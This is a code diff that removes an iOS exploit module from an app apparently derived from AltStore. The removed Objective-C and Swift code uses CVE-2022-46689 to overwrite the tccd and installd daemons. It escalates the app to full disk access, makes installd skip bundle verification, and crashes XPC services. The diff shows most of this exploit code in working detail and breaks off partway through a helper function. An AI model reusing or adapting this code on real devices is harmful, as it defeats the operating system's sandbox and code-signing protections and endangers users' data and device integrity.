             self.destinationViewController.view.alpha = 1.0
         }
         
-        if UserDefaults.standard.enableCowExploit, UserDefaults.standard.isCowExploitSupported {
-            if let previous_exploit_time = UserDefaults.standard.object(forKey: "cowExploitRanBootTime") {
-                let last_rantime = previous_exploit_time as! Date
-                if last_rantime == bootTime() {
-                    return print("exploit has ran this boot - \(last_rantime)")
-                }
-            }
-            self.runExploit()
-        }
-        
         self.didFinishLaunching = true
     }
-    
-    func runExploit() {
-        if UserDefaults.standard.enableCowExploit && UserDefaults.standard.isCowExploitSupported {
-            patch3AppLimit { result in
-                switch result {
-                case .success:
-                    UserDefaults.standard.set(bootTime(), forKey: "cowExploitRanBootTime")
-                    print("patched sucessfully")
-                case .failure(let err):
-                    switch err {
-                    case .NoFDA(let msg):
-                        self.displayError("Failed to get full disk access: \(msg)")
-                        return
-                    case .FailedPatchd:
-                        self.displayError("Failed to install patchd.")
-                        return
-                    }
-                }
-            }
-        }
-    }
 }

AltStore/MDCExploit/CowExploits.swift

@@ -1,123 +0,0 @@
-import Foundation
-
-let blankplist = "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPCFET0NUWVBFIHBsaXN0IFBVQkxJQyAiLS8vQXBwbGUvL0RURCBQTElTVCAxLjAvL0VOIiAiaHR0cDovL3d3dy5hcHBsZS5jb20vRFREcy9Qcm9wZXJ0eUxpc3QtMS4wLmR0ZCI+CjxwbGlzdCB2ZXJzaW9uPSIxLjAiPgo8ZGljdC8+CjwvcGxpc3Q+Cg=="
-
-enum PatchError: Error {
-    case NoFDA(msg: String)
-    case FailedPatchd
-}
-
-enum PatchResult {
-    case success, failure(PatchError)
-}
-
-func patch3AppLimit(completion: @escaping (PatchResult) -> ()) {
-    grant_fda { error in
-        if let error = error {
-            completion(.failure(PatchError.NoFDA(msg: "Failed to get full disk access: \(error)")))
-        }
-//        DispatchQueue.global(qos: .userInitiated).async {
-        print("This is run on a background queue")
-        if !installdaemon_patch() {
-            completion(.failure(PatchError.FailedPatchd))
-        }
-//        }
-        completion(.success)
-    }
-}
-
-func bootTime() -> Date? {
-    var tv = timeval()
-    var tvSize = MemoryLayout<timeval>.size
-    let err = sysctlbyname("kern.boottime", &tv, &tvSize, nil, 0)
-    guard err == 0, tvSize == MemoryLayout<timeval>.size else {
-        return nil
-    }
-    return Date(timeIntervalSince1970: Double(tv.tv_sec) + Double(tv.tv_usec) / 1_000_000.0)
-}
-
-enum WhitelistPatchResult {
-    case success, failure
-}
-
-//
-// func patchWhiteList() {
-//    overwriteFileData(originPath: "/private/var/db/MobileIdentityData/AuthListBannedUpps.plist", replacementData: try! Data(base64Encoded: blankplist)!)
-//    overwriteFileData(originPath: "/private/var/db/MobileIdentityData/AuthListBannedCdHashes.plist", replacementData: try! Data(base64Encoded: blankplist)!)
-//    overwriteFileData(originPath: "/private/var/db/MobileIdentityData/Rejections.plist", replacementData: try! Data(base64Encoded: blankplist)!)
-// }
-//
-// func overwriteFileData(originPath: String, replacementData: Data) -> Bool {
-//    #if false
-//        let documentDirectory = FileManager.default.urls(
-//            for: .documentDirectory,
-//            in: .userDomainMask
-//        )[0].path
-//
-//        let pathToRealTarget = originPath
-//        let originPath = documentDirectory + originPath
-//        let origData = try! Data(contentsOf: URL(fileURLWithPath: pathToRealTarget))
-//        try! origData.write(to: URL(fileURLWithPath: originPath))
-//    #endif
-//
-//    // open and map original font
-//    let fd = open(originPath, O_RDONLY | O_CLOEXEC)
-//    if fd == -1 {
-//        print("Could not open target file")
-//        return false
-//    }
-//    defer { close(fd) }
-//    // check size of font
-//    let originalFileSize = lseek(fd, 0, SEEK_END)
-//    guard originalFileSize >= replacementData.count else {
-//        print("Original file: \(originalFileSize)")
-//        print("Replacement file: \(replacementData.count)")
-//        print("File too big!")
-//        return false
-//    }
-//    lseek(fd, 0, SEEK_SET)
-//
-//    // Map the font we want to overwrite so we can mlock it
-//    let fileMap = mmap(nil, replacementData.count, PROT_READ, MAP_SHARED, fd, 0)
-//    if fileMap == MAP_FAILED {
-//        print("Failed to map")
-//        return false
-//    }
-//    // mlock so the file gets cached in memory
-//    guard mlock(fileMap, replacementData.count) == 0 else {
-//        print("Failed to mlock")
-//        return true
-//    }
-//
-//    // for every 16k chunk, rewrite
-//    print(Date())
-//    for chunkOff in stride(from: 0, to: replacementData.count, by: 0x4000) {
-//        print(String(format: "%lx", chunkOff))
-//        let dataChunk = replacementData[chunkOff..<min(replacementData.count, chunkOff + 0x4000)]
-//        var overwroteOne = false
-//        for _ in 0..<2 {
-//            let overwriteSucceeded = dataChunk.withUnsafeBytes { dataChunkBytes in
-//                unalign_csr(
-//                    fd, Int64(chunkOff), dataChunkBytes.baseAddress, dataChunkBytes.count
-//                )
-//            }
-//            if overwriteSucceeded {
-//                overwroteOne = true
-//                print("Successfully overwrote!")
-//                break
-//            }
-//            print("try again?!")
-//        }
-//        guard overwroteOne else {
-//            print("Failed to overwrite")
-//            return false
-//        }
-//    }
-//    print(Date())
-//    print("Successfully overwrote!")
-//    return true
-// }
-//
-// func readFile(path: String) -> String? {
-//    return (try? String?(String(contentsOfFile: path)) ?? "ERROR: Could not read from file! Are you running in the simulator or not unsandboxed?")
-// }

AltStore/MDCExploit/grant_fda.h

@@ -1,6 +0,0 @@
-#pragma once
-@import Foundation;
-
-/// Uses CVE-2022-46689 to grant the current app read/write access outside the sandbox.
-void grant_fda(void (^_Nonnull completion)(NSError* _Nullable));
-bool installdaemon_patch(void);

AltStore/MDCExploit/grant_fda.m

@@ -1,617 +0,0 @@
-@import Darwin;
-@import Foundation;
-@import MachO;
-
-#import <mach-o/fixup-chains.h>
-// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
-// WDBFontOverwrite
-// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
-// Please don't call this code on iOS 14 or below
-// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)
-#import "grant_fda.h"
-#import "helping_tools.h"
-#import "vm_unalign_csr.h"
-
-typedef NSObject* xpc_object_t;
-typedef xpc_object_t xpc_connection_t;
-typedef void (^xpc_handler_t)(xpc_object_t object);
-xpc_object_t xpc_dictionary_create(const char* const _Nonnull* keys,
-                                   xpc_object_t _Nullable const* values, size_t count);
-xpc_connection_t xpc_connection_create_mach_service(const char* name, dispatch_queue_t targetq,
-                                                    uint64_t flags);
-void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler);
-void xpc_connection_resume(xpc_connection_t connection);
-void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message,
-                                            dispatch_queue_t replyq, xpc_handler_t handler);
-xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection,
-                                                         xpc_object_t message);
-xpc_object_t xpc_bool_create(bool value);
-xpc_object_t xpc_string_create(const char* string);
-xpc_object_t xpc_null_create(void);
-const char* xpc_dictionary_get_string(xpc_object_t xdict, const char* key);
-
-int64_t sandbox_extension_consume(const char* token);
-
-// MARK: - patchfind
-
-struct fda_offsets {
-  uint64_t of_addr_com_apple_tcc_;
-  uint64_t offset_pad_space_for_rw_string;
-  uint64_t of_addr_s_kTCCSML;
-  uint64_t of_auth_got_sb_init;
-  uint64_t of_return_0;
-  bool is_arm64e;
-};
-
-static bool pchfind_sections(void* execmap,
-                               struct segment_command_64** data_seg,
-                               struct symtab_command** stabout,
-                               struct dysymtab_command** dystabout) {
-  struct mach_header_64* executable_header = execmap;
-  struct load_command* load_command = execmap + sizeof(struct mach_header_64);
-  for (int load_command_index = 0; load_command_index < executable_header->ncmds;
-       load_command_index++) {
-    switch (load_command->cmd) {
-      case LC_SEGMENT_64: {
-        struct segment_command_64* segment = (struct segment_command_64*)load_command;
-        if (strcmp(segment->segname, "__DATA_CONST") == 0) {
-          *data_seg = segment;
-        }
-        break;
-      }
-      case LC_SYMTAB: {
-        *stabout = (struct symtab_command*)load_command;
-        break;
-      }
-      case LC_DYSYMTAB: {
-        *dystabout = (struct dysymtab_command*)load_command;
-        break;
-      }
-    }
-    load_command = ((void*)load_command) + load_command->cmdsize;
-  }
-  return true;
-}
-
-static uint64_t pchfind_get_padding(struct segment_command_64* segment) {
-  struct section_64* section_array = ((void*)segment) + sizeof(struct segment_command_64);
-  struct section_64* last_section = &section_array[segment->nsects - 1];
-  return last_section->offset + last_section->size;
-}
-
-static uint64_t pchfind_pointer_to_string(void* em, size_t el, const char* n) {
-  void* str_offset = memmem(em, el, n, strlen(n) + 1);
-  if (!str_offset) {
-    return 0;
-  }
-  uint64_t str_file_offset = str_offset - em;
-  for (int i = 0; i < el; i += 8) {
-    uint64_t val = *(uint64_t*)(em + i);
-    if ((val & 0xfffffffful) == str_file_offset) {
-      return i;
-    }
-  }
-  return 0;
-}
-
-static uint64_t pchfind_return_0(void* exmp, size_t el) {
-  // TCCDSyncAccessAction::sequencer
-  // mov x0, #0
-  // ret
-  static const char ndle[] = {0x00, 0x00, 0x80, 0xd2, 0xc0, 0x03, 0x5f, 0xd6};
-  void* offset = memmem(exmp, el, ndle, sizeof(ndle));
-  if (!offset) {
-    return 0;
-  }
-  return offset - exmp;
-}
-
-static uint64_t pchfind_got(void* ecm, size_t executable_length,
-                              struct segment_command_64* data_const_segment,
-                              struct symtab_command* symtab_command,
-                              struct dysymtab_command* dysymtab_command,
-                              const char* target_symbol_name) {
-  uint64_t target_symbol_index = 0;
-  for (int sym_index = 0; sym_index < symtab_command->nsyms; sym_index++) {
-    struct nlist_64* sym =
-        ((struct nlist_64*)(ecm + symtab_command->symoff)) + sym_index;
-    const char* sym_name = ecm + symtab_command->stroff + sym->n_un.n_strx;
-    if (strcmp(sym_name, target_symbol_name)) {
-      continue;
-    }
-    // printf("%d %llx\n", sym_index, (uint64_t)(((void*)sym) - execmap));
-    target_symbol_index = sym_index;
-    break;
-  }
-
-  struct section_64* section_array =
-      ((void*)data_const_segment) + sizeof(struct segment_command_64);
-  struct section_64* first_section = &section_array[0];
-  if (!(strcmp(first_section->sectname, "__auth_got") == 0 ||
-        strcmp(first_section->sectname, "__got") == 0)) {
-    return 0;
-  }
-  uint32_t* indirect_table = ecm + dysymtab_command->indirectsymoff;
-
-  for (int i = 0; i < first_section->size; i += 8) {
-    uint64_t val = *(uint64_t*)(ecm + first_section->offset + i);
-    uint64_t indirect_table_entry = (val & 0xfffful);
-    if (indirect_table[first_section->reserved1 + indirect_table_entry] == target_symbol_index) {
-      return first_section->offset + i;
-    }
-  }
-  return 0;
-}
-
-static bool pchfind(void* execmap, size_t executable_length,
-                      struct fda_offsets* offsets) {
-  struct segment_command_64* data_const_segment = nil;
-  struct symtab_command* symtab_command = nil;
-  struct dysymtab_command* dysymtab_command = nil;
-  if (!pchfind_sections(execmap, &data_const_segment, &symtab_command,
-                          &dysymtab_command)) {
-//    printf("no sections\n");
-    return false;
-  }
-  if ((offsets->of_addr_com_apple_tcc_ =
-           pchfind_pointer_to_string(execmap, executable_length, "com.apple.tcc.")) == 0) {
-//    printf("no com.apple.tcc. string\n");
-    return false;
-  }
-  if ((offsets->offset_pad_space_for_rw_string =
-           pchfind_get_padding(data_const_segment)) == 0) {
-//    printf("no padding\n");
-    return false;
-  }
-  if ((offsets->of_addr_s_kTCCSML = pchfind_pointer_to_string(
-           execmap, executable_length, "kTCCServiceMediaLibrary")) == 0) {
-//    printf("no kTCCServiceMediaLibrary string\n");
-    return false;
-  }
-  if ((offsets->of_auth_got_sb_init =
-           pchfind_got(execmap, executable_length, data_const_segment, symtab_command,
-                         dysymtab_command, "_sandbox_init")) == 0) {
-//    printf("no sandbox_init\n");
-    return false;
-  }
-  if ((offsets->of_return_0 = pchfind_return_0(execmap, executable_length)) ==
-      0) {
-//    printf("no just return 0\n");
-    return false;
-  }
-  struct mach_header_64* executable_header = execmap;
-  offsets->is_arm64e = (executable_header->cpusubtype & ~CPU_SUBTYPE_MASK) == CPU_SUBTYPE_ARM64E;
-
-  return true;
-}
-
-// MARK: - tccd patching
-
-static void call_tcc_daemon(void (^completion)(NSString* _Nullable extension_token)) {
-  // reimplmentation of TCCAccessRequest, as we need to grab and cache the sandbox token so we can
-  // re-use it until next reboot.
-  // Returns the sandbox token if there is one, or nil if there isn't one.
-    //TODO WARNING REPLACE com.apple.tccd
-  xpc_connection_t connection = xpc_connection_create_mach_service(
-      "TXUWU", dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0), 0);
-  xpc_connection_set_event_handler(connection, ^(xpc_object_t object) {
-//    NSLog(@"event handler (xpc): %@", object);
-  });
-    xpc_connection_resume(connection);
-  const char* keys[] = {
-//      "TCCD_MSG_ID",  "function",           "service", "require_purpose", "preflight",
-//      "target_token", "background_session",
-  };
-  xpc_object_t values[] = {
-      xpc_string_create("17087.1"),
-      xpc_string_create("TCCAccessRequest"),
-      xpc_string_create("com.apple.app-sandbox.read-write"),
-      xpc_null_create(),
-      xpc_bool_create(false),
-      xpc_null_create(),
-      xpc_bool_create(false),
-  };
-  xpc_object_t request_message = xpc_dictionary_create(keys, values, sizeof(keys) / sizeof(*keys));
-#if 0
-  xpc_object_t response_message = xpc_connection_send_message_with_reply_sync(connection, request_message);
-//  NSLog(@"%@", response_message);
-
-#endif
-  xpc_connection_send_message_with_reply(
-      connection, request_message, dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0),
-      ^(xpc_object_t object) {
-        if (!object) {
-            //object is nil???
-//          NSLog(@"wqfewfw9");
-          completion(nil);
-          return;
-        }
-          //response:
-//        NSLog(@"qwdqwd%@", object);
-        if ([object isKindOfClass:NSClassFromString(@"OS_xpc_error")]) {
-//          NSLog(@"xpc error?");
-          completion(nil);
-          return;
-        }
-          //debug description:
-//        NSLog(@"wqdwqu %@", [object debugDescription]);
-        const char* extension_string = xpc_dictionary_get_string(object, "extension");
-        NSString* extension_nsstring =
-            extension_string ? [NSString stringWithUTF8String:extension_string] : nil;
-        completion(extension_nsstring);
-      });
-}
-
-static NSData* patch_tcc_daemon(void* executableMap, size_t executableLength) {
-  struct fda_offsets offsets = {};
-  if (!pchfind(executableMap, executableLength, &offsets)) {
-    return nil;
-  }
-
-  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
-  // strcpy(data.mutableBytes, "com.apple.app-sandbox.read-write", sizeOfStr);
-  char* mutableBytes = data.mutableBytes;
-  {
-    // rewrite com.apple.tcc. into blank string
-    *(uint64_t*)(mutableBytes + offsets.of_addr_com_apple_tcc_ + 8) = 0;
-  }
-  {
-    // make of_addr_s_kTCCSML point to "com.apple.app-sandbox.read-write"
-    // we need to stick this somewhere; just put it in the padding between
-    // the end of __objc_arrayobj and the end of __DATA_CONST
-    strcpy((char*)(data.mutableBytes + offsets.offset_pad_space_for_rw_string),
-           "com.apple.app-sandbox.read-write");
-    struct dyld_chained_ptr_arm64e_rebase tRBase =
-        *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
-                                                  offsets.of_addr_s_kTCCSML);
-    tRBase.target = offsets.offset_pad_space_for_rw_string;
-    *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
-                                              offsets.of_addr_s_kTCCSML) =
-        tRBase;
-    *(uint64_t*)(mutableBytes + offsets.of_addr_s_kTCCSML + 8) =
-        strlen("com.apple.app-sandbox.read-write");
-  }
-  if (offsets.is_arm64e) {
-    // make sandbox_init call return 0;
-    struct dyld_chained_ptr_arm64e_auth_rebase tRBase = {
-        .auth = 1,
-        .bind = 0,
-        .next = 1,
-        .key = 0,  // IA
-        .addrDiv = 1,
-        .diversity = 0,
-        .target = offsets.of_return_0,
-    };
-    *(struct dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
-                                                   offsets.of_auth_got_sb_init) =
-        tRBase;
-  } else {
-    // make sandbox_init call return 0;
-    struct dyld_chained_ptr_64_rebase tRBase = {
-        .bind = 0,
-        .next = 2,
-        .target = offsets.of_return_0,
-    };
-    *(struct dyld_chained_ptr_64_rebase*)(mutableBytes + offsets.of_auth_got_sb_init) =
-        tRBase;
-  }
-  return data;
-}
-
-static bool over_write_file(int fd, NSData* sourceData) {
-  for (int off = 0; off < sourceData.length; off += 0x4000) {
-    bool success = false;
-    for (int i = 0; i < 2; i++) {
-      if (unalign_csr(
-              fd, off, sourceData.bytes + off,
-              off + 0x4000 > sourceData.length ? sourceData.length - off : 0x4000)) {
-        success = true;
-        break;
-      }
-    }
-    if (!success) {
-      return false;
-    }
-  }
-  return true;
-}
-
-static void grant_fda_impl(void (^completion)(NSString* extension_token,
-                                                           NSError* _Nullable error)) {
-//  char* targetPath = "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd";
-      char* targetPath = "/Nope";
-  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
-  if (fd == -1) {
-    // iOS 15.3 and below
-//    targetPath = "/System/Library/PrivateFrameworks/TCC.framework/tccd";
-          targetPath = "/Nope";
-    fd = open(targetPath, O_RDONLY | O_CLOEXEC);
-  }
-  off_t targetLength = lseek(fd, 0, SEEK_END);
-  lseek(fd, 0, SEEK_SET);
-  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
-
-  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
-  NSData* sourceData = patch_tcc_daemon(targetMap, targetLength);
-  if (!sourceData) {
-    completion(nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                                        code:5
-                                    userInfo:@{NSLocalizedDescriptionKey : @"Can't patchfind."}]);
-    return;
-  }
-
-  if (!over_write_file(fd, sourceData)) {
-    over_write_file(fd, originalData);
-    munmap(targetMap, targetLength);
-    completion(
-        nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                                 code:1
-                             userInfo:@{
-                               NSLocalizedDescriptionKey : @"Can't overwrite file: your device may "
-                                                           @"not be vulnerable to CVE-2022-46689."
-                             }]);
-    return;
-  }
-  munmap(targetMap, targetLength);
-
-//  crash_with_xpc_thingy("com.apple.tccd");
-    
-  sleep(1);
-  call_tcc_daemon(^(NSString* _Nullable extension_token) {
-    over_write_file(fd, originalData);
-//    crash_with_xpc_thingy("com.apple.tccd");
-    NSError* returnError = nil;
-    if (extension_token == nil) {
-      returnError =
-          [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                              code:2
-                          userInfo:@{
-                            NSLocalizedDescriptionKey : @"no extension token returned."
-                          }];
-    } else if (![extension_token containsString:@"com.apple.app-sandbox.read-write"]) {
-      returnError = [NSError
-          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                     code:3
-                 userInfo:@{
-                   NSLocalizedDescriptionKey : @"failed: returned a media library token "
-                                               @"instead of an app sandbox token."
-                 }];
-      extension_token = nil;
-    }
-    completion(extension_token, returnError);
-  });
-}
-
-void grant_fda(void (^completion)(NSError* _Nullable)) {
-  if (!NSClassFromString(@"NSPresentationIntent")) {
-    // class introduced in iOS 15.0.
-    // TODO(zhuowei): maybe check the actual OS version instead?
-    completion([NSError
-        errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                   code:6
-               userInfo:@{
-                 NSLocalizedDescriptionKey :
-                     @"Not supported on iOS 14 and below."
-               }]);
-    return;
-  }
-  NSURL* documentDirectory = [NSFileManager.defaultManager URLsForDirectory:NSDocumentDirectory
-                                                                  inDomains:NSUserDomainMask][0];
-  NSURL* sourceURL =
-      [documentDirectory URLByAppendingPathComponent:@"fda_token.txt"];
-  NSError* error = nil;
-  NSString* cachedToken = [NSString stringWithContentsOfURL:sourceURL
-                                                   encoding:NSUTF8StringEncoding
-                                                      error:&error];
-  if (cachedToken) {
-    int64_t handle = sandbox_extension_consume(cachedToken.UTF8String);
-    if (handle > 0) {
-      // cached version worked
-      completion(nil);
-      return;
-    }
-  }
-  grant_fda_impl(^(NSString* extension_token, NSError* _Nullable error) {
-    if (error) {
-      completion(error);
-      return;
-    }
-    int64_t handle = sandbox_extension_consume(extension_token.UTF8String);
-    if (handle <= 0) {
-      completion([NSError
-          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
-                     code:4
-                 userInfo:@{NSLocalizedDescriptionKey : @"Failed to consume generated extension"}]);
-      return;
-    }
-    [extension_token writeToURL:sourceURL
-                     atomically:true
-                       encoding:NSUTF8StringEncoding
-                          error:&error];
-    completion(nil);
-  });
-}
-
-/// MARK - installd patch
-
-struct daemon_remove_app_limit_offsets {
-  uint64_t offset_objc_method_list_t_MIInstallableBundle;
-  uint64_t offset_objc_class_rw_t_MIInstallableBundle_baseMethods;
-  uint64_t offset_data_const_end_padding;
-  // MIUninstallRecord::supportsSecureCoding
-  uint64_t offset_return_true;
-};
-
-struct daemon_remove_app_limit_offsets gAppLimitOffsets = {
-    .offset_objc_method_list_t_MIInstallableBundle = 0x519b0,
-    .offset_objc_class_rw_t_MIInstallableBundle_baseMethods = 0x804e8,
-    .offset_data_const_end_padding = 0x79c38,
-    .offset_return_true = 0x19860,
-};
-
-static uint64_t pchfind_find_rwt_base_methods(void* execmap,
-                                                      size_t executable_length,
-                                                      const char* needle) {
-  void* str_offset = memmem(execmap, executable_length, needle, strlen(needle) + 1);
-  if (!str_offset) {
-    return 0;
-  }
-  uint64_t str_file_offset = str_offset - execmap;
-  for (int i = 0; i < executable_length - 8; i += 8) {
-    uint64_t val = *(uint64_t*)(execmap + i);
-    if ((val & 0xfffffffful) != str_file_offset) {
-      continue;
-    }
-    // baseMethods
-    if (*(uint64_t*)(execmap + i + 8) != 0) {
-      return i + 8;
-    }
-  }
-  return 0;
-}
-
-static uint64_t pchfind_returns_true(void* execmap, size_t executable_length) {
-  // mov w0, #1
-  // ret
-  static const char needle[] = {0x20, 0x00, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6};
-  void* offset = memmem(execmap, executable_length, needle, sizeof(needle));
-  if (!offset) {
-    return 0;
-  }
-  return offset - execmap;
-}
-
-static bool pchfind_deaaamon(void* execmap, size_t executable_length,
-                               struct daemon_remove_app_limit_offsets* offsets) {
-  struct segment_command_64* data_const_segment = nil;
-  struct symtab_command* symtab_command = nil;
-  struct dysymtab_command* dysymtab_command = nil;
-  if (!pchfind_sections(execmap, &data_const_segment, &symtab_command,
-                          &dysymtab_command)) {
-//    printf("no sections\n");
-    return false;
-  }
-  if ((offsets->offset_data_const_end_padding = pchfind_get_padding(data_const_segment)) == 0) {
-//    printf("no padding\n");
-    return false;
-  }
-  if ((offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods =
-           pchfind_find_rwt_base_methods(execmap, executable_length,
-                                                 "MIInstallableBundle")) == 0) {
-//    printf("no MIInstallableBundle class_rw_t\n");
-    return false;
-  }
-  offsets->offset_objc_method_list_t_MIInstallableBundle =
-      (*(uint64_t*)(execmap +
-                    offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods)) &
-      0xffffffull;
-
-  if ((offsets->offset_return_true = pchfind_returns_true(execmap, executable_length)) ==
-      0) {
-//    printf("no return true\n");
-    return false;
-  }
-  return true;
-}
-
-struct objc_method {
-  int32_t name;
-  int32_t types;
-  int32_t imp;
-};
-
-struct objc_method_list {
-  uint32_t entsizeAndFlags;
-  uint32_t count;
-  struct objc_method methods[];
-};
-
-static void patch_cpy_methods(void* mutableBytes, uint64_t old_offset,
-                                        uint64_t new_offset, uint64_t* out_copied_length,
-                                        void (^callback)(const char* sel,
-                                                         uint64_t* inout_function_pointer)) {
-  struct objc_method_list* original_list = mutableBytes + old_offset;
-  struct objc_method_list* new_list = mutableBytes + new_offset;
-  *out_copied_length =
-      sizeof(struct objc_method_list) + original_list->count * sizeof(struct objc_method);
-  new_list->entsizeAndFlags = original_list->entsizeAndFlags;
-  new_list->count = original_list->count;
-  for (int method_index = 0; method_index < original_list->count; method_index++) {
-    struct objc_method* method = &original_list->methods[method_index];
-    // Relative pointers
-    uint64_t name_file_offset = ((uint64_t)(&method->name)) - (uint64_t)mutableBytes + method->name;
-    uint64_t types_file_offset =
-        ((uint64_t)(&method->types)) - (uint64_t)mutableBytes + method->types;
-    uint64_t imp_file_offset = ((uint64_t)(&method->imp)) - (uint64_t)mutableBytes + method->imp;
-    const char* sel = mutableBytes + (*(uint64_t*)(mutableBytes + name_file_offset) & 0xffffffull);
-    callback(sel, &imp_file_offset);
-
-    struct objc_method* new_method = &new_list->methods[method_index];
-    new_method->name = (int32_t)((int64_t)name_file_offset -
-                                 (int64_t)((uint64_t)&new_method->name - (uint64_t)mutableBytes));
-    new_method->types = (int32_t)((int64_t)types_file_offset -
-                                  (int64_t)((uint64_t)&new_method->types - (uint64_t)mutableBytes));
-    new_method->imp = (int32_t)((int64_t)imp_file_offset -
-                                (int64_t)((uint64_t)&new_method->imp - (uint64_t)mutableBytes));
-  }
-};
-
-static NSData* make_installdaemon_patch(void* executableMap, size_t executableLength) {
-  struct daemon_remove_app_limit_offsets offsets = {};
-  if (!pchfind_deaaamon(executableMap, executableLength, &offsets)) {
-    return nil;
-  }
-
-  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
-  char* mutableBytes = data.mutableBytes;
-  uint64_t current_empty_space = offsets.offset_data_const_end_padding;
-  uint64_t copied_size = 0;
-  uint64_t new_method_list_offset = current_empty_space;
-  patch_cpy_methods(mutableBytes, offsets.offset_objc_method_list_t_MIInstallableBundle,
-                              current_empty_space, &copied_size,
-                              ^(const char* sel, uint64_t* inout_address) {
-                                if (strcmp(sel, "performVerificationWithError:") != 0) {
-                                  return;
-                                }
-                                *inout_address = offsets.offset_return_true;
-                              });
-  current_empty_space += copied_size;
-  ((struct
-    dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
-                                          offsets
-                                              .offset_objc_class_rw_t_MIInstallableBundle_baseMethods))
-      ->target = new_method_list_offset;
-  return data;
-}
-
-bool installdaemon_patch() {
-  const char* targetPath = "/usr/libexec/installd";
-  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
-  off_t targetLength = lseek(fd, 0, SEEK_END);
-  lseek(fd, 0, SEEK_SET);
-  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
-
-  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
-  NSData* sourceData = make_installdaemon_patch(targetMap, targetLength);
-  if (!sourceData) {
-      //can't patchfind
-//    NSLog(@"wuiydqw98uuqwd");
-    return false;
-  }
-
-  if (!over_write_file(fd, sourceData)) {
-    over_write_file(fd, originalData);
-    munmap(targetMap, targetLength);
-      //can't overwrite
-//    NSLog(@"wfqiohuwdhuiqoji");
-    return false;
-  }
-  munmap(targetMap, targetLength);
-  crash_with_xpc_thingy("com.apple.mobile.installd");
-  sleep(1);
-
-  // TODO(zhuowei): for now we revert it once installd starts
-  // so the change will only last until when this installd exits
-//  over_write_file(fd, originalData);
-  return true;
-}

AltStore/MDCExploit/helping_tools.h

@@ -1,12 +0,0 @@
-#ifndef helpers_h
-#define helpers_h
-
-char* get_temporary_file_location_paths(void);
-void test_nsexpressions(void);
-char* setup_temporary_file(void);
-
-void crash_with_xpc_thingy(char* service_name);
-
-#define ROUND_DOWN_PAGE(val) (val & ~(PAGE_SIZE - 1ULL))
-
-#endif /* helpers_h */

AltStore/MDCExploit/helping_tools.m

@@ -1,139 +0,0 @@
-#import <Foundation/Foundation.h>
-#include <string.h>
-#include <mach/mach.h>
-#include <dirent.h>
-
-char* get_temporary_file_location_paths(void) {
-  return strdup([[NSTemporaryDirectory() stringByAppendingPathComponent:@"AAAAs"] fileSystemRepresentation]);
-}
-
-// create a read-only test file we can target:
-char* setup_temporary_file(void) {
-  char* path = get_temporary_file_location_paths();
-//  printf("path: %s\n", path);
-  
-  FILE* f = fopen(path, "w");
-  if (!f) {
-//    printf("opening the tmp file failed...\n");
-    return NULL;
-  }
-  char* buf = malloc(PAGE_SIZE*10);
-  memset(buf, 'A', PAGE_SIZE*10);
-  fwrite(buf, PAGE_SIZE*10, 1, f);
-  //fclose(f);
-  return path;
-}
-
-kern_return_t
-bootstrap_look_up(mach_port_t bp, const char* service_name, mach_port_t *sp);
-
-struct x_p_c_w_zerozero_t {
-  mach_msg_header_t hdr;
-  mach_msg_body_t body;
-  mach_msg_port_descriptor_t client_port;
-  mach_msg_port_descriptor_t reply_port;
-};
-
-mach_port_t get_and_send_this_whatever_once_wow(mach_port_t recv) {
-  mach_port_t so = MACH_PORT_NULL;
-  mach_msg_type_name_t type = 0;
-  kern_return_t err = mach_port_extract_right(mach_task_self(), recv, MACH_MSG_TYPE_MAKE_SEND_ONCE, &so, &type);
-  if (err != KERN_SUCCESS) {
-      //a=port right extraction failed: %s\n
-//    printf("PREFail: %s\n", mach_error_string(err));
-    return MACH_PORT_NULL;
-  }
-    //made so: 0x%x from recv: 0x%x\n
-//  printf("ms 0x%x fr: 0x%x\n", so, recv);
-  return so;
-}
-
-// copy-pasted from an exploit I wrote in 2019...
-// still works...
-
-// (in the exploit for this: https://googleprojectzero.blogspot.com/2019/04/splitting-atoms-in-xnu.html )
-
-void crash_with_xpc_thingy(char* service_name) {
-  mach_port_t client_port = MACH_PORT_NULL;
-  mach_port_t reply_port = MACH_PORT_NULL;
-
-  mach_port_t service_port = MACH_PORT_NULL;
-
-  kern_return_t err = bootstrap_look_up(bootstrap_port, service_name, &service_port);
-  if(err != KERN_SUCCESS){
-      //unable to look up
-//    printf("utluqwd %s\n", service_name);
-    return;
-  }
-
-  if (service_port == MACH_PORT_NULL) {
-      //bad service port
-//    printf("wih1221udq\n");
-    return;
-  }
-
-  // allocate the client and reply port:
-  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &client_port);
-  if (err != KERN_SUCCESS) {
-      //port allocation failed:
-//    printf("padiuhewi %s\n", mach_error_string(err));
-    return;
-  }
-
